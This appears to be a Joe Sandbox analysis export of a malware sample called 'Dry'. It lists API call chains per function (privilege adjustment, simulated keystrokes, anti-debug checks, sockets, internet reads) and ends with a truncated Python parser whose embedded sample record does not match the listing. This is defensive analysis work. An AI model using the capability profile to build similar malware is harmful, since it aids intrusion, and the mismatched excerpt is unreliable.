                                                                                                                                                                                                                                                                                    • Opcode ID: 4b9358856ed5697e0709811427a9df8ac038648d2d7bc3872792d538d26fef14
                                                                                                                                                                                                                                                                                    • Instruction ID: 8101cb30b10f4f50fe9993e626ee41459d9f7d3dae36a54b0550442d79776548
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b9358856ed5697e0709811427a9df8ac038648d2d7bc3872792d538d26fef14
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69113971200701BFE7218B65DC48F2BBBF9EFC5B91F1442ACB946972A0DB71E9458A60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B41916
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B41922
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B41931
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B41938
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B4194E
                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00B41C81), ref: 00B420FB
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B42107
                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00B4210E
                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B42127
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00B41C81), ref: 00B4213B
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B42142
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9a2a1dbfaa71daa7ac6ecbaf433f2ba26c029e2db04477fcff9056a9d067bb66
                                                                                                                                                                                                                                                                                    • Instruction ID: ed75c578a48b46e568d766b22d5ed97deabc4274b06983f59ed47f0c8380e25c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a2a1dbfaa71daa7ac6ecbaf433f2ba26c029e2db04477fcff9056a9d067bb66
• Instruction Fuzzy Hash: F311D071500204FFEB109FA4CC09FAEBBF9EF45395F944098FA45A7220CB359A81EB60
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B5A5BD
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B5A6D0
  • Part of subcall function 00B542B9: GetInputState.USER32 ref: 00B54310
  • Part of subcall function 00B542B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B543AB
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B5A5ED
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B5A6BA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: 9a0edfee6559a2b1221c970a537dba114721702930ba68ec99977036552a45f9
• Instruction ID: 81390a04b485c5d6dfec4fecb45876ad0ba7e7366a168a6bd858c4e8d1f14446
• Opcode Fuzzy Hash: 9a0edfee6559a2b1221c970a537dba114721702930ba68ec99977036552a45f9
• Instruction Fuzzy Hash: 39415C7190020AAFDB15DFA4C949BEEBBF4EF15351F1441D6E805B21A1EB709E88CF61
APIs
• DefDlgProcW.USER32(?,?), ref: 00AE233E
• GetSysColor.USER32(0000000F), ref: 00AE2421
• SetBkColor.GDI32(?,00000000), ref: 00AE2434
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Color$Proc
• String ID:
• API String ID: 929743424-0
• Opcode ID: 61112d9cae490dfbf27026ba079fc326c344d320e62c7e264cb26cb4a8085fde
• Instruction ID: cd76d0ff197590e746aab53513a5813be5e130ebf86ba3de87cb8b8a8ff38c09
• Opcode Fuzzy Hash: 61112d9cae490dfbf27026ba079fc326c344d320e62c7e264cb26cb4a8085fde
• Instruction Fuzzy Hash: 608144B02044A1BAE639663A9C98FBF25EEEB42700B104249F107CE5A5C96DCF429772
APIs
  • Part of subcall function 00B63AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B63AD7
  • Part of subcall function 00B63AAB: _wcslen.LIBCMT ref: 00B63AF8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B622BA
• WSAGetLastError.WSOCK32 ref: 00B622E1
• bind.WSOCK32(00000000,?,00000010), ref: 00B62338
• WSAGetLastError.WSOCK32 ref: 00B62343
• closesocket.WSOCK32(00000000), ref: 00B62372
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 7059ec36de46bacc4221b83ebbcd319553550e3a7fba8adcde11515ee45c221e
• Instruction ID: ed8bbc4ad7392e9c8e606e715e0d3ea57eea2f29cc8f55b88bcbfeb18e2a28ea
• Opcode Fuzzy Hash: 7059ec36de46bacc4221b83ebbcd319553550e3a7fba8adcde11515ee45c221e
• Instruction Fuzzy Hash: A051C171A00200AFE710EF64C986F2A77E5EF44754F088098F9499F3C3CB75AD428BA1
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 2244d5139d3a6affceb44f7b7739c27a96861893d2d2abeacf432de2e7985d16
• Instruction ID: d4b3d21e9a23a8ac1cca31a11eea5c640bdcefd2bcf027b8d9a79291f077e4c0
• Opcode Fuzzy Hash: 2244d5139d3a6affceb44f7b7739c27a96861893d2d2abeacf432de2e7985d16
• Instruction Fuzzy Hash: 2521E0317002108FE7199F2AC944B1A7BE5EF94364F19C0ADE85E8B352DB71ED42CB90
APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 00B5D8CE
• GetLastError.KERNEL32(?,00000000), ref: 00B5D92F
• SetEvent.KERNEL32(?,?,00000000), ref: 00B5D943
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 35c9f9315ea628e1baa820035857bf038b4ca58744fe74293077de62f80e24af
                                                                                                                                                                                                                                                                                    • Instruction ID: c65f16241e308d780d63ee0970019c65bcd89c0dc2b3bffd7508b398f7ae9d12
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35c9f9315ea628e1baa820035857bf038b4ca58744fe74293077de62f80e24af
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4821A171500705EFE7309F65C888BAA77FCEF40315F10459DEA4692191EB70EE49CB50
APIs
• lstrlenW.KERNEL32(?,00B246AC), ref: 00B4E482
• GetFileAttributesW.KERNEL32(?), ref: 00B4E491
• FindFirstFileW.KERNEL32(?,?), ref: 00B4E4A2
• FindClose.KERNEL32(00000000), ref: 00B4E4AE
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
• Opcode ID: c8492e079e904f3ee24d4ff4d2987d7883c4e36c00dcfc625f96248a48a79ccd
• Instruction ID: 9148a4c20b04388439a6f21de04a7a4b87c241eea616b9221d56fac3337c5903
• Opcode Fuzzy Hash: c8492e079e904f3ee24d4ff4d2987d7883c4e36c00dcfc625f96248a48a79ccd
• Instruction Fuzzy Hash: DEF0A0304109105B92106B38EC0D8AE77BDFE02335B504B81F87AC22E0DB78DA96A695
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
• Opcode ID: 12e8249fbe1150c94acfc82c357e7078a8b078d54b64ca5820f9629bc3beb286
• Instruction ID: f94dc1c304450d117426ba5466066467485be865f353ff7df4e93f3fd026dfd6
• Opcode Fuzzy Hash: 12e8249fbe1150c94acfc82c357e7078a8b078d54b64ca5820f9629bc3beb286
• Instruction Fuzzy Hash: FED062B1C0811CEACB90DA90DDCADB973FCAB19741F7444D7F916E1091EB24D9449B25
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00B12A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00B12A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00B12AA1
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: a31252309bd357ed6f7945261c9f8adc14124432a67104e1d7e3853e64e9e715
• Instruction ID: c3ab90cc04a6c305866f72b6fbf677aef7e10a27c58a035443b08a71777b28e7
• Opcode Fuzzy Hash: a31252309bd357ed6f7945261c9f8adc14124432a67104e1d7e3853e64e9e715
• Instruction Fuzzy Hash: B231B6759112189BCB21DF68D9897DDBBF4AF08310F5042EAE80CA7251EB309BC58F55
APIs
  • Part of subcall function 00B0014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B009D8
  • Part of subcall function 00B0014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B009F5
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B4205A
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B42087
• GetLastError.KERNEL32 ref: 00B42097
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
• Opcode ID: 8fe837bbe688020a990dfa4974379bdebf4062642fa4fcd5b39a104b0798745c
• Instruction ID: 23d07b7eed740dc99b4b34cee0a591fd0eedbd3e27bf0e5caff8f9fd31190635
• Opcode Fuzzy Hash: 8fe837bbe688020a990dfa4974379bdebf4062642fa4fcd5b39a104b0798745c
• Instruction Fuzzy Hash: 05119DB1414205AFD718AF54EC86E6ABBF8EF44750B20855EF04667291DB70AC41DA24
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002,00000000), ref: 00B05079
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002,00000000), ref: 00B05080
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00B05092
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c87a44b8f87bf16526c336a3975651bb0224fef428a5f5c1cb0bd4bcf8767e73
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a43c6a45618f05ec1adc8947525b95cd2ee3d9a2a913051348f7d92c87f04af
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c87a44b8f87bf16526c336a3975651bb0224fef428a5f5c1cb0bd4bcf8767e73
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBE0B631000548AFCF216F64DD09E993FB9EF50785F514054F84A9B961EB36DD82CED4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00B3E664
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                                                                                                                    • String ID: X64
                                                                                                                                                                                                                                                                                    • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                    • Opcode ID: 64430f48358028b905527a9b4628f0814e316b3bd666f04f162d3dc7e944a292
                                                                                                                                                                                                                                                                                    • Instruction ID: 686d77360d89bd328ef8a3d43b3aeb87fbea1fdf32a8186a10085e618c4a16bc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64430f48358028b905527a9b4628f0814e316b3bd666f04f162d3dc7e944a292
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD0C9B480111DEACF90CB90ECC8ED973BCBB04304F100696F106E2040DB30A5488B10
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B652EE,?,?,00000035,?), ref: 00B54229
                                                                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B652EE,?,?,00000035,?), ref: 00B54239
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ce218fec925037103e52a3f2a27e1ca199b9ae8cc8b42c30f492495495181b35
                                                                                                                                                                                                                                                                                    • Instruction ID: e5b4822e88b8624134860d2af6eda0fda2b99d8868e658db9579b93de32d548d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce218fec925037103e52a3f2a27e1ca199b9ae8cc8b42c30f492495495181b35
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEF0E5307102256AE720176AAC4DFEB76BEEFC5761F0001B5F909E3181DA709984C6B0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B4BC24
                                                                                                                                                                                                                                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B4BC37
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e2722272a02cd8950cf783274445c6b3402b1dabc8d04ee8ea120301b0d1c2f2
                                                                                                                                                                                                                                                                                    • Instruction ID: 1b772c950f9c3db5457668620472d82cf7a6f322e8ef31f544afdad8be72bbbd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2722272a02cd8950cf783274445c6b3402b1dabc8d04ee8ea120301b0d1c2f2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5F06D7180424DABDB059FA4C845BBE7BB0FF04309F008049F955A6192D779C601DF94
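The per-function records above (an "APIs" list with call-site addresses, then the "Similarity" fields such as API ID and Instruction Fuzzy Hash) are easier to work with in bulk once parsed: you can order the call sites by address to recover the call sequence inside each function, and group functions by what their API chain does (the AdjustTokenPrivileges chain, the SendInput/keybd_event chain, the GetUserNameW call). The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the report. The record text embedded in it is an excerpt of the listing above, reduced to the fields the parser uses; the capability labels are this example's own triage heuristics, not labels the report assigns.

```python
"""Parse Joe Sandbox per-function records and tag the API chains.

Added example, not Joe Sandbox tooling. SAMPLE is an excerpt of the
function listing on this page; CAPABILITIES is this example's own
heuristic mapping from API names to a coarse label.
"""
import re

# Constructed sample: three records in the layout of the listing above.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(?,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002,00000000), ref: 00B05079
• TerminateProcess.KERNEL32(00000000,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002,00000000), ref: 00B05080
• ExitProcess.KERNEL32 ref: 00B05092
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
Similarity
• API ID: Process$CurrentExitTerminate
• Instruction Fuzzy Hash: FBE0B631000548AFCF216F64DD09E993FB9EF50785F514054F84A9B961EB36DD82CED4
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B4BC24
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B4BC37
Similarity
• API ID: InputSendkeybd_event
• Instruction Fuzzy Hash: B5F06D7180424DABDB059FA4C845BBE7BB0FF04309F008049F955A6192D779C601DF94
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B41B48), ref: 00B41A20
• CloseHandle.KERNEL32(?,?,00B41B48), ref: 00B41A35
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR" (no argument list).
API_RE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Heuristic labels (this example's own). A label is attached when any listed API appears.
CAPABILITIES = {
    "token-privilege-adjust": {"AdjustTokenPrivileges", "LookupPrivilegeValueW", "LookupPrivilegeValueA"},
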